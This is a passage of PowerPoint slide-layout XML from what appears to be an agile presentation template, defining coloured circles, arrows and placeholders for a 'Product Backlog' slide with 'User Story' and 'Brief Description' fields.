          <a:p>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
              <a:latin typeface="Dosis Regular"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5">
            <a:extLst>
              <a:ext uri="{65A22016-13C5-4247-AB6F-7A9A96BBFB3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4EE39F-2B95-4A15-9EA0-18EA9C6EB608}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2714625" y="1028700"/>
            <a:ext cx="1285875" cy="1285875"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D14B24"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Title 6">
            <a:extLst>
              <a:ext uri="{080BC4B2-5116-479D-8B2C-42B079F2B31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4D7F9EB-13C2-4060-8195-61C3AB6C6D54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4036218" y="2357437"/>
            <a:ext cx="1285875" cy="1285875"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="8EB91E"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 7">
            <a:extLst>
              <a:ext uri="{FBD5891F-F5BA-49EF-8F43-4C2B9521BA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1EB8A4-9BD4-457E-B117-9E29B64A9C73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2714625" y="3679031"/>
            <a:ext cx="1285875" cy="1285875"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="47BEA8"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Title 8">
            <a:extLst>
              <a:ext uri="{9075AE7E-044C-44C3-979F-04BDA5B491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5902B53-F9E7-432C-BFC1-6C26BEEB7786}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1357312" y="2357437"/>
            <a:ext cx="1285875" cy="1285875"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3478B6"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="Group 9">
            <a:extLst>
              <a:ext uri="{83BDC02D-F6A5-4FB4-9DCA-3BFBE96DD80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2A5012-78CC-409C-B29D-6CF5E97F0891}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="13500000">
            <a:off x="5553108" y="2775082"/>
            <a:ext cx="341308" cy="432726"/>
            <a:chOff x="4520109" y="3282283"/>
            <a:chExt cx="455078" cy="576968"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Right Arrow 13">
              <a:extLst>
                <a:ext uri="{93B9118F-7407-453E-B8FC-26DFFA3B0F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AECE2CE-DC1A-4C58-93E5-B73691D7A16E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="8100000">
              <a:off x="4520109" y="3282283"/>
              <a:ext cx="455078" cy="576968"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 60000"/>
                <a:gd name="adj2" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg2">
                <a:lumMod val="90000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:effectLst/>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0">
              <a:schemeClr val="accent1">
                <a:tint val="60000"/>
                <a:hueOff val="0"/>
                <a:satOff val="0"/>
                <a:lumOff val="0"/>
              </a:schemeClr>
            </a:lnRef>
            <a:fillRef idx="1">
              <a:srgbClr val="000000"/>
            </a:fillRef>
            <a:effectRef idx="0">
              <a:schemeClr val="accent1"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="lt1"/>
            </a:fontRef>
          </p:style>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Right Arrow 4">
              <a:extLst>
                <a:ext uri="{3206C261-D197-420D-AA81-A9649CA09BB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98555D-AFB4-47E5-BDB4-AF888F002B65}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="18900000">
              <a:off x="4636639" y="3349409"/>
              <a:ext cx="318554" cy="346180"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="AFCAF7"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="AFCAF7"/>
              </a:solidFill>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0">
              <a:srgbClr val="000000"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:srgbClr val="000000"/>
            </a:fillRef>
            <a:effectRef idx="0">
              <a:schemeClr val="accent1"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="lt1"/>
            </a:fontRef>
          </p:style>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" numCol="1" spcCol="0" rtlCol="0" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" lvl="0" indent="0" algn="ctr">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="35000"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{7515ABAC-6BC3-4DC8-9029-B4062AAB9E0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46836E1-DCA5-4054-A03C-0100BB7A9CE3}"/>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1548313B-A9B7-42E8-BDC3-CA79F78104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9D6865-374B-4DE1-B2E0-4ED43C2B41BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18900000">
            <a:off x="2514600" y="2107406"/>
            <a:ext cx="308171" cy="432726"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 60000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="90000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:srgbClr val="000000"/>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:srgbClr val="000000"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" numCol="1" spcCol="0" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Arrow: Right 14">
            <a:extLst>
              <a:ext uri="{F05ED43B-3979-433E-9301-68077E3BEA3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ACE4CA-750A-4083-A51C-9120E39458FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2700000">
            <a:off x="3857625" y="2110030"/>
            <a:ext cx="308171" cy="432726"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 60000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="90000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:srgbClr val="000000"/>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:srgbClr val="000000"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" numCol="1" spcCol="0" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Arrow: Right 15">
            <a:extLst>
              <a:ext uri="{7954323A-D922-4B34-8106-0473DDEE03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48B10BC-6C72-4320-9208-35FAE255D06E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="8100000">
            <a:off x="3857625" y="3450431"/>
            <a:ext cx="308171" cy="432726"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 60000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="90000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:srgbClr val="000000"/>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:srgbClr val="000000"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" numCol="1" spcCol="0" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Arrow: Right 16">
            <a:extLst>
              <a:ext uri="{2FFA7A49-269E-4F23-886C-1A8E0454CF8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3A7DDA-DA69-46CD-A4C9-E327C68A3426}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="13500000">
            <a:off x="2514600" y="3450431"/>
            <a:ext cx="308171" cy="432726"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 60000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="90000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:srgbClr val="000000"/>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:srgbClr val="000000"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" numCol="1" spcCol="0" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Title 17">
            <a:extLst>
              <a:ext uri="{FECFC80F-359D-4BB0-8BA0-746F91A8870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E1B994-A48D-4E55-BF42-686659E595C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="6"/>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19" name="Content Placeholder 18">
            <a:extLst>
              <a:ext uri="{F5027803-4DF0-498F-B2C8-D37D20F60D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148639-2EC3-44D2-BCE7-B3BFC1D0F3EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6067425" y="2695575"/>
            <a:ext cx="2152650" cy="571500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Unica One"/>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Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{5587F36C-1F31-481A-9776-DD01658171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4DDA3E-7781-4F2B-8FEA-E39158A17D29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="8"/>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63ED71BA-ECC5-4A8B-B8DF-F6E91B10DBD2}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>November 12, 2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Footer Placeholder 1">
            <a:extLst>
              <a:ext uri="{41EA39B7-1BD9-4B2F-BC91-4F9608C324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4B099C-D643-478C-8431-7DFD1B7F1421}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="9"/>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extLst>
      <p:ext uri="{39776AE5-5AE3-4918-B451-912AB045A2E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Product Backlog">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{E598EB46-A854-4E4F-A8C1-B3F0CE796A3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C90BFA1-EEE9-4F25-85D7-D5354B64D1D3}"/>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4DC3AB55-B18A-481A-9E2E-CC69B96571A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1773172-220F-41E8-9ED9-2117EBFF5D17}"/>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169C68B1-A5E7-4F5F-B1F5-3052194516BF}" type="slidenum">
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Picture Placeholder 18">
            <a:extLst>
              <a:ext uri="{B0542258-086F-498C-A57D-DD095F1D7E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BB61A4-5CBC-4F7B-ACBD-F05951FF79C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7980760" y="4746804"/>
            <a:ext cx="919162" cy="221403"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="ctr">
              <a:defRPr lang="en-US" sz="1400" baseline="0" dirty="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Place Logo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{7126BF4A-352F-4C0A-8560-C541E520F4D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94A5A63-826C-4599-AB4E-E41E0DCD4645}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4071937" y="285750"/>
            <a:ext cx="4321968" cy="642937"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1800" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1">
              <a:defRPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2">
              <a:defRPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3">
              <a:defRPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4">
              <a:defRPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Dosis Regular"/>
              </a:rPr>
              <a:t>The product backlog is like a wish list of all the things that could make the product better.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 29">
            <a:extLst>
              <a:ext uri="{0D379D80-971B-4101-A6FE-0568DF6781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29A996-818E-4A5A-83B9-59DF854B6BC0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1357312" y="2638425"/>
            <a:ext cx="1607343" cy="228600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User Story</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 31">
            <a:extLst>
              <a:ext uri="{2326A031-BE16-4B57-8E3C-EB34099E403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F291F4C-6874-4F88-AE2E-2284AED7EA86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1357312" y="2886075"/>
            <a:ext cx="1607343" cy="607218"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="142875" lvl="0" indent="-142875">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="1400" dirty="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>• Brief Description</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 29">
            <a:extLst>
              <a:ext uri="{6C8A04F0-CBF7-4B2E-AB2D-1B2937522EC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71593C3-A53E-4F7E-91CC-254EAE302FC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1357312" y="1543050"/>
            <a:ext cx="1607343" cy="228600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User Story</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Placeholder 31">
            <a:extLst>
              <a:ext uri="{3F531261-0289-4A47-AFFA-18F72E50D1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94995C-0FD6-4836-B453-3A59877FA921}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1357312" y="1781175"/>
            <a:ext cx="1607343" cy="607218"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
